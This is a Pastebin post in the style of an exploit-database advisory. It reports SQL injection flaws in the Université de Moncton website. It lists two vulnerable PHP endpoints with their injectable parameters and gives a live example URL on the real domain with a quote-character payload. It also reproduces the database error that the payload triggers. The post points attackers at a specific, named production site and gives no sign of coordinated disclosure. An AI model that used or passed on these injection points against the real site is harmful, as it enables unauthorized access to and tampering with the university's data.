KingSkrupellos

Universite de Moncton Edmunston Shippagan Canada SQL Inj

Aug 20th, 2019
109
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.58 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Universite de Moncton Edmunston Shippagan Canada SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 21/08/2019
  7. # Vendor Homepage : umoncton.ca
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16.  
  17. ###################################################################
  18.  
  19. # Impact :
  20. ***********
  21. Universite de Moncton Edmunston Shippagan Canada is prone to an SQL-injection
  22. vulnerability because it fails to sufficiently sanitize user-supplied data before using
  23. it in an SQL query. Exploiting this issue could allow an attacker to compromise
  24. the application, access or modify data, or exploit latent vulnerabilities
  25. in the underlying database. A remote attacker can send a specially crafted request
  26. to the vulnerable application and execute arbitrary SQL commands in
  27. application`s database. Further exploitation of this vulnerability may result in
  28. unauthorized data manipulation. An attacker can exploit this issue using a browser
  29. or with any SQL Injector Tool.
  30.  
  31. ###################################################################
  32.  
  33. # SQL Injection Exploit :
  34. **********************
  35. /repertoire/index.php?table=1&lien=1&campus_select=&faculte_select=
  36. &departement_select=&campus_id=&programmes_descriptions_id=[SQL Injection]
  37.  
  38. /institutionnel/includes/repertoire_description.inc.php?programme_print=1&id=[SQL Injection]
  39.  
  40. ###################################################################
  41.  
  42. # Example Vulnerable Sites :
  43. *************************
  44. [+] umoncton.ca/repertoire/index.php?table=1&lien=1&campus_select=
  45. &faculte_select=&departement_select=&campus_id=&programmes_descriptions_id=1%27
  46.  
  47. ###################################################################
  48.  
  49. # Example SQL Database Error :
  50. ****************************
  51. Query failed: You have an error in your SQL syntax; check the manual that
  52. corresponds to your MySQL server version for the right syntax to use
  53. near '' AND etats = 1' at line 1
  54.  
  55. ###################################################################
  56.  
  57. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  58.  
  59. ###################################################################
Add Comment
Please, Sign In to add comment